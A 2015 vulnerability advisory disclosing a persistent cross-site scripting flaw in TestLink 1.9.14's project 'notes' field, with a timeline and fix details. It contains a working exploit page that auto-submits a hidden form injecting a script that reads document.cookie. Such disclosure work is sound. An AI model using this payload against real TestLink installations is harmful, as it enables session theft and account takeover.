TestLink 1.9.14 Cross Site Scripting
Posted on 10 November 2015
Information ================================= Name: Persistent XSS Vulnerability in TestLink 1.9.14 Affected Software: TestLink Affected Versions: 1.9.14 and possibly below Vendor Homepage: http://testlink.org/ Severity: High Status: Fixed Vulnerability Type: ================================= Persistent XSS CVE Reference: ================================= Not assigned Technical Details: ================================= Persistent XSS entry point exist in TestLink 1.9.14 allowing arbitrary client side browser code execution on victims who visit persistently stored XSS payloads. The vulnerability has been discovered in the POST request to create a new Test Project. By exploiting the vulnerability, the attacker will get access to the logged in users session cookie. No Filtering exist on the vulnerable parameter. Vulnerable Parameter: ================================= notes Exploit Code ================================= <html lang="en"> <head> <title>Exploit Persistent XSS TestLink 1.9.14</title> </head> <body> <form action="http://localhost/testlink_1_9_14/lib/project/projectEdit.php" id="formid" method="post"> <input type="hidden" name="CSRFName" value="" /> <input type="hidden" name="CSRFToken" value="" /> <input type="hidden" name="copy_from_tproject_id" value="0" /> <input type="hidden" name="tprojectName" value="c1" /> <input type="hidden" name="tcasePrefix" value="c2" /> <input type="hidden" name="notes" value="<script>alert(document.cookie)</script>" /> <input type="hidden" name="optPriority" value="on" /> <input type="hidden" name="optAutomation" value="on" /> <input type="hidden" name="active" value="on" /> <input type="hidden" name="is_public" value="on" /> <input type="hidden" name="doAction" value="doCreate" /> <input type="hidden" name="tprojectID" value="0" /> <input type="hidden" name="doActionButton" value="Create" /> </form> <script> document.getElementById('formid').submit(); </script> </body> </html> Exploitation Technique: =================================== Remote Severity Level: =================================== High Advisory Timeline =================================== Sat, 7 Nov 2015 13:14:33 +0530 - First Contact Sat, 7 Nov 2015 08:52:14 +0100 - Vendor Response Sat, 7 Nov 2015 13:00:54 +0100 - Vendor Fixed Sun, 8 Nov 2015 19:03:00 +0530 - Public Disclosure Solution ==================================== This vulnerability is fixed in TestLink 1.9.15 (Tauriel) Fix: https://github.com/TestLinkOpenSourceTRMS/testlink-code/commit/1cb1f78f1a50f6e6819bcbadeae345eb3213c487 Credits & Authors ==================================== Aravind C Ajayan, Boney S Kalarickal
